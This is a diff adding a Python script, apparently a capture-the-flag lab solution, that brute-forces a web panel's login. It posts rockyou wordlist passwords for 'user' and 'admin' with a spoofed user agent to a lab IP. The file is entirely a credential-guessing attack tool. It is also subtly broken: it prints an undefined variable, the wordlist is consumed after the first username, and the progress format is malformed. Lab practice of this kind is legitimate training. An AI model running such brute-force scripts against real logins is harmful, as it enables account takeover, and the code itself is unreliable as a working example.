2026-03-11

AoC/2025/24/username.py

@@ -0,0 +1,49 @@
+import requests
+import json
+import os
+
+#{
+#    "service": "Wormhole Control Panel",
+#    "endpoints": {
+#        "\/terminal.php?action=info": "Public info",
+#        "\/terminal.php?action=login": "POST: username,password",
+#        "\/terminal.php?action=pin": "POST: attempt PIN to get temporary admin token",
+#        "\/terminal.php?action=status": "GET: wormhole status",
+#        "\/terminal.php?action=close": "POST: close wormhole"
+#    },
+#    "note": "This panel only answers to terminal user agents. Use the endpoints to fully close the wormhole."
+#}  
+
+def main():
+    wordlist = "/usr/share/wordlists/rockyou.txt"
+    url = "10.81.152.59"
+    proto = "http"
+    target = "terminal.php?action=login"
+    user_agent = "secretcomputer"
+    headers = {"User-Agent": user_agent}
+    username = ["user", "admin"]
+
+    lines = int(os.popen(f"wc -l {wordlist}").read().split()[0])
+    print(lines)
+    count = 0
+
+    try:
+        with open(wordlist, 'r') as file:
+            for user in username:
+                for word in file:
+                    count += 1
+                    print(f"Bruteforce in progress: {count/2/lines:0.000000f}%", end="\r")
+                    data = {"username": user, "password": word}
+                    response = requests.post(f"{proto}://{url}/{target}", data=data, headers=headers).json()
+                    if isinstance(response, dict):
+                        if response["status"] != "fail":
+                            print(f"Credentials found: {user}:{password}")
+    except FileNotFoundError:
+        print("File not found")
+        return
+    except Exception as e:
+        print(f"An Error occured: {e}")
+        return
+
+if __name__ == "__main__":
+    main()